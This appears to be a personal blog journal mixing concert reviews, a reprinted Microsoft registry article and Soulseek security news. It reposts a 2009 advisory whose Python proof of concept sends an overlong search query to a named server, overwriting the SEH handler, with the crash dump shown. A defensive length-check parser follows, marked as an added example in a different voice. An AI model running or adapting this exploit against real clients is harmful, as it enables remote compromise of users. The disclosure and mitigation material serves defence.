Journal

  • Ibrahim at home + bass player ill, but very intimate.

    Apr 24 2012, 19:44

    Mon 23 Apr – Tinariwen



    Lille Vega, as a playground for musicians, hosting about 300 people, is the perfect setting for intimate experiences.
    Almost shaking hands with the musicians, we had a great evening in the company of Tinariwen, though Ibrahim (front man) was home and the bass player had gotten sick from eating some Italian food (in Italy).

    The rest of the crew did marvelous work, getting the show on the road, keeping the very friendly crowd wanting more, as their guitars gently weeped, so to speak:

    [youtube]http://youtu.be/e2Vpc2VUCOI[/youtube]
    [youtube]http://youtu.be/TfGksO6S9Uw[/youtube]



  • Invited home at Midlake's place

    Feb 6 2010, 8:32

    Fri 5 Feb – Midlake, Sarah Jaffe

    Eight man band playing this night, gave a performance that invited us home in their living room. Tightly knitted, very well played, but a bit of lack of corresponding with the crowd, gave a little distance, though.

    4 of 6 stars
  • Info June 2009: Vista SP2, How to enable the half-open TCP connections limit ...

    Jun 8 2009, 21:24

    For those of you who use the patch for tcpip.sys...

    MS-link


    Article ID: 969710 - Last Review: May 6, 2009 - Revision: 1.0

    How to enable the half-open TCP connections limit in Windows Vista with Service Pack 2 and in Windows Server 2008 with Service Pack 2


    INTRODUCTION
    By default, the half-open TCP connections limit is disabled in Windows Server 2008 with Service Pack 2 (SP2) and in Windows Vista with Service Pack 2 (SP2). This article describes how to impose the half-open TCP connections limit in Windows Server 2008 with SP2 and in Windows Vista with SP2. The limit is ten connections.

    Note In Windows Server 2008 and in Windows Vista with Service Pack 1 (SP1), the system allows for a maximum of ten half-open TCP connections at any time.

    MORE INFORMATION
    How to enable the half-open TCP connections limit

    Important This section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly. Therefore, make sure that you follow these steps carefully. For added protection, back up the registry before you modify it. Then, you can restore the registry if a problem occurs. For more information about how to back up and restore the registry, click the following article number to view the article in the Microsoft Knowledge Base:
    322756 (http://support.microsoft.com/kb/322756/ ) How to back up and restore the registry in Windows
    To enable the half-open TCP connections limit in Windows Server 2008 with SP2 or in Windows Vista with SP2, set the value of the EnableConnectionRateLimiting DWORD registry entry to 1 (0x00000001). To do this, follow these steps:

    1. Click Start, type regedit in the Start Search box, and then click regedit.exe in the Programs list.
       If you are prompted for an administrator password or for confirmation, type your password, or click Continue.
    2. Locate and then double-click the following registry key:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\EnableConnectionRateLimiting
    3. In the Value data box, type 1, and then click OK.
    4. Exit Registry Editor.
    5. Restart the computer.

    APPLIES TO

    * Windows Vista Service Pack 2
    * Windows Vista Enterprise 64-bit Edition
    * Windows Vista Home Basic 64-bit Edition
    * Windows Vista Home Premium 64-bit Edition
    * Windows Vista Ultimate 64-bit Edition
    * Windows Vista Business 64-bit Edition
    * Windows Vista Business
    * Windows Vista Enterprise
    * Windows Vista Home Basic
    * Windows Vista Home Premium
    * Windows Vista Starter
    * Windows Vista Ultimate
    * Windows Server 2008 Datacenter without Hyper-V
    * Windows Server 2008 Enterprise without Hyper-V
    * Windows Server 2008 for Itanium-Based Systems
    * Windows Server 2008 Standard without Hyper-V
    * Windows Server 2008 Datacenter
    * Windows Server 2008 Enterprise
    * Windows Server 2008 Standard
    * Windows Web Server 2008
    * Windows Small Business Server 2008 Premium
    * Windows Small Business Server 2008 Standard
  • Follow up on the patch

    Jun 5 2009, 8:26

    Soulseek Patched!
    Soulseek maintainer Nir Arbel released a new Soulseek version (157 Ns 13e) which plugs the security hole in previous clients.
    He also limited the search query length on the server, to avoid any kind of mass random attacks.

    Contacting the Soulseek team was hard, but I need to mention that it wasn't because they were under-considering this security bug; they were just not reachable, because of some circumstances that can happen.

    I want to thank Nir Arbel for his very professional way of handling this security bug, once contact could be made.

    The Soulseek server was patched in a matter of hours after he acknowledged the security advisory, and he released a patched Soulseek client yesterday, after the bug was triggered locally.

    Another advisory regarding another way to exploit this security hole will be responsibly disclosed when all clients on the Slsk network have been upgraded.

    blog-link
  • slsk, new version, why

    Jun 5 2009, 7:06

    http://seclists.org/fulldisclosure/2009/May/0209.html

    Full Disclosure: Soulseek * P2P Remote Distributed Search Code Execution

    From: laurent gaffie <laurent.gaffie_at_gmail.com>
    Date: Mon, 25 May 2009 17:54:40 -0400

    =============================================
    - Release date: May 24th, 2009
    - Discovered by: Laurent Gaffié
    - Severity: critical
    =============================================

    I. VULNERABILITY
    -------------------------
    Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution

    II. BACKGROUND
    -------------------------
    "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file sharing application.
    One of the things that makes Soulseek(tm) unique is our community and community-related features.
    Based on peer-to-peer technology, virtual rooms allow you to meet people with the same interests, share information, and chat freely using real-time messages in public or private.
    Soulseek(tm), with its built-in people matching system, is a great way to make new friends and expand your mind!"

    III. DESCRIPTION
    -------------------------
    Soulseek client allows distributed file search to one person, everyone, or in a specific Soulseek IRC channel, allowing a user to find the files he wants, in a dedicated channel, or with his contacts, or on the whole network.
    Unfortunately this feature is vulnerable to a remote SEH overwrite to a specific user, or even to a whole Soulseek IRC channel.

    IV. PROOF OF CONCEPT
    -------------------------
    This proof of concept is made to prevent a S-K party, it is only built to target the user "testt4321".

    To try this proof of concept, you would have to open a soulseek client and use the username:
    "testt4321"
    with the password:
    "12345678"
    And launch this code.
    If you want to change the username or target a whole channel, you would have to reverse the binary protocol

    #!/usr/bin/python
    import struct
    import sys, socket
    from time import *

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("208.76.170.50",2242)) # Change to Port 2240 for 156* branch

    buffer = "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
    buffer+= "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
    buffer+= "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
    buffer+= "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
    buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"

    s.send(buffer)
    sleep(1)

    junk = "\x41" * 3084
    next_seh = struct.pack('<L', 0x42424242)
    seh = struct.pack('<L', 0x43434343)
    other_junk = "\x61" * 1423

    buffer2 = "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
    buffer2+= "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
    s.send(buffer2)
    sleep(1)
    s.recv(1024)

    After the query is sent, the memory will look like this
    0012FBE4 41414141
    0012FBE8 42424242 Pointer to next SEH record
    0012FBEC 43434343 SE handler
    0012FBF0 61616161

    And the program will terminate with this structure:
    EAX 00000000
    ECX 43434343
    EDX 7C9132BC ntdll.7C9132BC
    EBX 00000000
    ESP 0012EA78
    EBP 0012EA98
    ESI 00000000
    EDI 00000000
    EIP 43434343

    V. BUSINESS IMPACT
    -------------------------
    An attacker could exploit this vulnerability to compromise any Soulseek client connected to the Soulseek network.

    VI. SYSTEMS AFFECTED
    -------------------------
    Windows all versions running Soulseek *

    VII. SOLUTION
    -------------------------
    A fast solution would be to use Nicotine-Plus (http://nicotine-plus.sourceforge.net/), a Python Soulseek client.
    Another quick workaround (at server level) would be to limit the search query length.

    VIII. REFERENCES
    -------------------------
    http://www.slsknet.org

    IX. CREDITS
    -------------------------
    This vulnerability has been discovered by Laurent Gaffié
    Laurent.gaffie{remove-this}(at)gmail.com

    X. REVISION HISTORY
    -------------------------
    May 24, 2009: Initial release

    XI. DISCLOSURE TIMELINE
    -------------------------
    July 29, 2008: Bug discovered
    September 03, 2008: Vendor contacted; no response.
    October 14, 2008: Vendor contacted; still no response.
    April 12, 2009: Idefense contacted.
    April 13, 2009: Idefense answered.
    April 23, 2009: Advisory sent to idefense contributor program.
    May 13, 2009: Idefense contacted, bug rejected (no reason given)
    May 15, 2009: Idefense recontacted; no answer.
    May 16, 2009: Last try to contact Soulseek maintainers
    May 24, 2009: Advisory published.
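
The server-side workaround named in the advisory's Solution section (limit the search query length), sketched as an added example that is not from the advisory or from Soulseek: a strict parser for the search frame layout read off the PoC's second message (little-endian length, code 0x2a, length-prefixed user name, 4-byte value, length-prefixed query). The 256-byte query limit, the 64-byte user name cap, the `token` name and all function names are assumptions.

```python
import struct

MAX_QUERY_LEN = 256   # assumed limit; the page does not state the server's value
MAX_USER_LEN = 64     # assumed cap on the user name field
USER_SEARCH = 42      # message code seen in the PoC's second frame (0x2a)

class FrameError(ValueError):
    """Raised when a frame is malformed or exceeds the policy limits."""

def _read_u32(buf, off):
    if off + 4 > len(buf):
        raise FrameError("truncated integer")
    return struct.unpack_from("<I", buf, off)[0], off + 4

def _read_str(buf, off, limit):
    n, off = _read_u32(buf, off)
    if n > limit:                      # policy check before touching the data
        raise FrameError(f"string of {n} bytes exceeds limit {limit}")
    if off + n > len(buf):             # declared length must fit in the frame
        raise FrameError("declared string length overruns frame")
    return buf[off:off + n], off + n

def parse_user_search(frame, max_query=MAX_QUERY_LEN):
    """Validate one search frame; return (user, token, query) or raise."""
    declared, off = _read_u32(frame, 0)
    if declared != len(frame) - 4:
        raise FrameError("frame length field does not match bytes received")
    code, off = _read_u32(frame, off)
    if code != USER_SEARCH:
        raise FrameError(f"unexpected message code {code}")
    user, off = _read_str(frame, off, MAX_USER_LEN)
    token, off = _read_u32(frame, off)
    query, off = _read_str(frame, off, max_query)
    if off != len(frame):
        raise FrameError("trailing bytes after query")
    return user.decode("latin-1"), token, query.decode("latin-1")

def build_frame(user, token, query):
    """Constructed sample input: encode a search frame in the same layout."""
    body = struct.pack("<I", USER_SEARCH)
    body += struct.pack("<I", len(user)) + user
    body += struct.pack("<I", token)
    body += struct.pack("<I", len(query)) + query
    return struct.pack("<I", len(body)) + body

def check(frame):
    """Return the parsed tuple, or a 'rejected: ...' string for logging."""
    try:
        return parse_user_search(frame)
    except FrameError as exc:
        return f"rejected: {exc}"
```

A relay that drops every frame for which `check` returns a rejection never forwards an over-long query to clients, whatever their version.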
  • Soulad

    Jan 25 2009, 16:11

  • Some info on slsk

    Jan 21 2009, 21:25



    and

  • Info on slsk status, nov 2008

    Nov 23 2008, 1:56

  • Foobar /last.fm

    Jan 25 2008, 14:28

    a little message to last.fm users: you may have to update your Foobar Plugin in the software, after the recent last.fm update. There is also a "new" foobar out at:

    http://filehippo.com/download_foobar2000

    changelog is here: http://filehippo.com/download_foobar2000/changelog/

  • Nice link for some bootleg XTC stuff

    Jun 13 2007, 22:11